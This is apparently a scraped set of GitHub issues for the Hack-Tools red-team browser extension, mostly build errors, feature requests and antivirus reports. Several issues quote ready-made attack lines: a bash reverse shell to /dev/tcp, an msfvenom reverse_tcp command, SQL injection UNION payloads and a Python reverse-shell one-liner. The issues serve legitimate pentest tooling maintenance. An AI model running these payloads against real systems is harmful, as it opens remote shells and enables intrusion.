lascc / hack-tools Goto Github PK

At the moment, loading Hack-Tools in my Chromium based browser throws an error with the version number defined in the manifest.json file, specifically because the version is 0.1.2b. This is what the file looks like at the moment (as of this release):

{
  "name": "Hack Tools",
  "version": "0.1.2b",
  "description": "The all in one Red team extension for web pentester",
  "browser_action": {
    "default_title": "Hack Tools",
    "default_popup": "index.html",
    "default_icon": {
      "16": "get_started16.png",
      "32": "get_started32.png",
      "48": "get_started48.png",
      "128": "get_started128.png"
    }
  },
  "icons": {
    "16": "get_started16.png",
    "32": "get_started32.png",
    "48": "get_started48.png",
    "128": "get_started128.png"
  },
  "manifest_version": 2,
  "devtools_page": "devtools.html"
}

Switching 0.1.2b to 0.1.2 manually seemed to fix the issue for me, and it'd be great if this change could be incorporated in the next release too.

I cannot find the option to put Hack-Tools into Dark mode, my browser is set to Dark Mode already.

Would it be possible to get Font Scaling? SHould I open a separate issue for that?

First of all, this tool looks really nice, good job there!

I think it would be good to have an Useful Windows commands (similar to the Linux one)

My .2 😄

This is horrible and wrong this goes against school rules

Powershell handy commands missed a double quote on the below command.

wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn"

https://github.com/LasCC/Hack-Tools/blob/6fb9fa2191d97f216955e0a2458542283ecf3d77/src/components/TtySpawnShell.js#L157

I think it must be Ruby spawn shell because Python spawn shell has already there.

Cool

What's the license for code in this repo?

It looks like your amazing extension got removed from the Firefox Add-on site, did they tell you why?

https://addons.mozilla.org/en-US/firefox/addon/hacktools/

Is it possible to provide a compiled xpi so we can manually install in Firefox?

Hi,
It seems the copy icon at syntax of MSF Venom Command is not correct

When I paste in Terminal Console or Notepad, it always insert comma between each selection

msfvenom -p ,linux/x64/shell/reverse_tcp, LHOST=10.10.16.15, LPORT=4444, --platform linux, -a x64,false,false,false,false, -f elf, -o reverse-x64.exe

→ If I remove all the comma, it works

Regards!

$ npm install && npm run build
npm ERR! code ERESOLVE
npm ERR! ERESOLVE unable to resolve dependency tree
npm ERR!
npm ERR! While resolving: [email protected]
npm ERR! Found: [email protected]
npm ERR! node_modules/react
npm ERR! react@"^18.2.0" from the root project
npm ERR!
npm ERR! Could not resolve dependency:
npm ERR! peer react@"17.0.2" from @hot-loader/[email protected]
npm ERR! node_modules/@hot-loader/react-dom
npm ERR! @hot-loader/react-dom@"^17.0.2" from the root project
npm ERR!
npm ERR! Fix the upstream dependency conflict, or retry
npm ERR! this command with --force or --legacy-peer-deps
npm ERR! to accept an incorrect (and potentially broken) dependency resolution.

Dear DEVs,

thank you for this great and useful extension!

The version on addons.mozilla.org is still at 0.4..0, while 0.5.0 is available as release here.

Am I missing something? :)

$ uname -a
Darwin 51pwns-MacBook-Pro.local 21.4.0 Darwin Kernel Version 21.4.0: Mon Feb 21 20:34:37 PST 2022; root:xnu-8020.101.4~2/RELEASE_X86_64 x86_64
$ npm -v
8.5.5
$ node -v
v17.8.0

npm install

64 timing idealTree Completed in 19938ms
165 timing command:install Completed in 19950ms
166 verbose stack Error: could not resolve
166 verbose stack     at PlaceDep.failPeerConflict (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js:546:25)
166 verbose stack     at PlaceDep.place (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js:197:21)
166 verbose stack     at new PlaceDep (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js:71:10)
166 verbose stack     at /usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js:964:31
166 verbose stack     at Array.map (<anonymous>)
166 verbose stack     at Arborist.[buildDepStep] (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js:964:8)
166 verbose stack     at async Arborist.buildIdealTree (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js:216:7)
166 verbose stack     at async Promise.all (index 1)
166 verbose stack     at async Arborist.reify (/usr/local/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/reify.js:153:5)
166 verbose stack     at async Install.exec (/usr/local/lib/node_modules/npm/lib/commands/install.js:159:5)
167 verbose cwd /Users/51pwn/MyWork/Hack-Tools
168 verbose Darwin 21.4.0
169 verbose argv "/usr/local/Cellar/node/17.8.0/bin/node" "/usr/local/bin/npm" "install"
170 verbose node v17.8.0
171 verbose npm  v8.5.5
172 error code ERESOLVE

npm ERR! code ERESOLVE
npm ERR! ERESOLVE could not resolve
npm ERR! 
npm ERR! While resolving: [email protected]
npm ERR! Found: [email protected]
npm ERR! node_modules/react
npm ERR!   react@"latest" from the root project
npm ERR!   peer react@">=16.0.0" from @ant-design/[email protected]
npm ERR!   node_modules/@ant-design/icons
npm ERR!     @ant-design/icons@"4.7.0" from the root project
npm ERR!   1 more (react-dom)
npm ERR! 
npm ERR! Could not resolve dependency:
npm ERR! @hot-loader/react-dom@"^17.0.1" from the root project
npm ERR! 
npm ERR! Conflicting peer dependency: [email protected]
npm ERR! node_modules/react
npm ERR!   peer react@"17.0.2" from @hot-loader/[email protected]
npm ERR!   node_modules/@hot-loader/react-dom
npm ERR!     @hot-loader/react-dom@"^17.0.1" from the root project
npm ERR! 
npm ERR! Fix the upstream dependency conflict, or retry
npm ERR! this command with --force, or --legacy-peer-deps
npm ERR! to accept an incorrect (and potentially broken) dependency resolution.

As someone who is familiar with windows power shell, it came to a surprise that a Firefox extension would have wrong/outdated tools on its extension. Please fix this soon.

Hi there,

This might be known -but not finding references to it. Windows defender is reporting the extension as containing malware, notably Win32/Uwamson.A!ml

I suspect it's due to the content of the extension and that the AV heuristics are reporting on that, more than actual malware.

Just thought I'd let you know if you've not heard about it.

The red box in the figure should be "' UNION SELECT column_name,NULL FROM all_tab_columns where table_name="X" -- -"

Hi! First congratulations on the plugin. It's my favorite. Second, I wanted to report that the encode of a bash reverse shell is not working correctly. Encode always never works. See the result of what I copied:

bash%20-c%20'exec%20bash%20-i%20&%3E/dev/tcp/10.4.12.124/1234%20%3C&1'

Now look at the difference between another well known tool. I believe that some bars need to be replaced for it to work correctly.

bash%20-c%20%27exec%20bash%20-i%20%26%3E%2Fdev%2Ftcp%2F10.4.12.124%2F1234%20%3C%261%27

By: https://www.urlencoder.org/

Thanks.

https://attackerkb.com/

How did you change the colors of google chrome like in the images above? Is there an extension for this? @LasCC @rb-x (If those screenshots were taken in some other browser, I am sorry for asking.)

Add some SSRF payload to enumerate ec2 instances?

it's a very interesting project!

Would you consider adding a license to this repository to specify under which terms this code can be used?

I open hack-tools in a browser tab and pin it, so that its easily accessible. But the lack of favicon makes it so I don't immediately know what the pinned tab is.

Currently:

Hi @LasCC , thanks for the good work. I ported the extension to safari. It works perfectly in full screen mode. The only issue is that there is a lag when using the popup mode. Aside that it's pretty cool. Thanks.

Instructions to build for Safari

1. Following the build instruction in the README
2. Create a safari web extension project using the command below. NB: This is to be run once.

xcrun safari-web-extension-coverter [path_to_dist_folder]

Follow the instructions to create the project. Default language should be Swift.
3. Build project.
4. Open Safari and enable unsigned extensions; Develop -> Allow Unsigned Extensions.
5. Open Safari -> Preferences -> Extensions and enable Hack-Tools
6. Click on the extension icon and switch to full screen mode.

_Originally posted by @newshourindia in git clone https://github.com/LasCC/Hack-Tools.git
cd Hack-Tools
npm install && npm run build # If you have installed yarn you can replace npm with yarn

i have copied the bash url encoded and put it in my kali linux therminal but it says "zsh: no such file or directory: bash%20-c%20exec%20bash%20-i%20&%3E/dev/tcp//%20%3C&1
"

Hello again, I saw that you fixed the URL encode issue. I believe an interesting addition would be to put a Reverse Shell in NodeJS. See some examples at the link below:

https://medium.com/dont-code-me-on-that/bunch-of-shells-nodejs-cdd6eb740f73

Thanks.

I did not get CVE Search engine on your tool. If I click the CVE icon It says that report that bug.

Not sure why, but yarn will not build this. Keeps giving me an error of no such directory

' UNION SELECT column_name,NULL FROM where table_name="X" -- - should be ' UNION SELECT column_name,NULL FROM all_tab_columns where table_name="X" -- -

Hey Team any solution

while Building from source code facing npm error issue. (npm latest version )

Second kindly add Custom Payload add features in the Next firefox (dist) version .

https://github.com/LasCC/Hack-Tools/blob/939e12fb9bbd94f379a7457ca95e4559919c0295/src/components/web/PhpReverseShell.js#L35

I'm getting an error like below attached screenshot. Could you please explain how can I run it ?

I got same issue as @UchihaSR : #28 (comment)
Then I following the error message and change this to what the error told :

• change the File_transfer to file_transfer in https://github.com/LasCC/Hack-Tools/blob/6d3c623b16ffd715a36a8db4ac00f3b292b7a5c7/src/components/LayoutApp.js#L21 so it would become import FileTransfer from './file_transfer/file_transfer''
• change the Cve to cve in https://github.com/LasCC/Hack-Tools/blob/6d3c623b16ffd715a36a8db4ac00f3b292b7a5c7/src/components/FeedRSS.js#L8 import cve from './rss/cve'

And rerun yarn build result successfull build dist
I don't know why it happen just File_transfer & Cve. The fact that all inside folder components works fine.

• Hi, I ran into 2 errors when build it locally with npm run build

ERROR in ./src/components/LayoutApp.js
Module not found: Error: Can't resolve './file_transfer/File_transfer' in '/home/madscientist/Documents/CTFTools/chrome-extensions/Hack-Tools/src/components'
 @ ./src/components/LayoutApp.js 19:0-57 104:20-32
 @ ./src/App.js

ERROR in ./src/components/FeedRSS.js
Module not found: Error: Can't resolve './rss/Cve' in '/home/madscientist/Documents/CTFTools/chrome-extensions/Hack-Tools/src/components'
 @ ./src/components/FeedRSS.js 8:0-28 103:24-27 116:26-29
 @ ./src/components/LayoutApp.js
 @ ./src/App.js

• Then i found it's caused by 2 typing errors

./src/components/LayoutApp.js:19: import FileTransfer from "./file_transfer/File_transfer";
=> should be "./file_transfer/file_transfer"
./src/components/FeedRSS.js:8: import cve from './rss/Cve';
=> should be "./rss/cve"

• Btw, the command to build locally with npm in README.md should be

npm install && npm run build

• Hope u will fix those on git version

Hey!

I'm developing a bunch of hash APIs, the most recent one is: https://github.com/HashPals/Name-That-Hash

It has a web API for the website ( https://nth.skerritt.blog ), if you wanted I could make a "pretty" URL for the API for you to use? It takes about a second to get the results :)

Also talk to me on Discord if you're interested, I have my GitHub notifs off :) https://discord.gg/CGSDqEA

I have work with this extension for a while and I recently noticed the presence of a 'dev' branch, which appears to be much more interesting than master branch.

So do we have any release of the dev branch ? When will we see this new version ?

Un fichier infecté a tenté de s'exécuter sur votre appareil.
Nom de la menace: Heur.BZC.PZQ.Boxter.6009.024F0EB9
Chemin : /Users/rafaelmoreno/Anytime/Hack-Tools/src/components/linux/ReverseShell.tsx
Nous avons effacé ce fichier en quarantaine pour éviter que des commandes malveillantes soient exécutées sur votre appareil.

Hello,

I would like to report a bug in the MSF Venom Builder. When copying the generated payload to the clipboard, commas appear between each value, which can cause issues when trying to use the payload in other tools or scripts.

Steps to reproduce:

1. Launch the MSF Venom Builder.
2. Select the desired payload and options.
3. Click the "Copy to Clipboard" button for msf venom command.
4. Paste the clipboard contents into a text editor or other tool.

Expected result:
The generated payload should be copied to the clipboard without any extra characters or formatting.

Actual result:
Commas appear between each value of the generated payload when it is copied to the clipboard.

This bug can be frustrating and time-consuming to work around, and I would appreciate it if the developers could investigate and fix the issue as soon as possible.

Thank you for your attention to this matter.

TODO :

Replace python reverse shell by

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'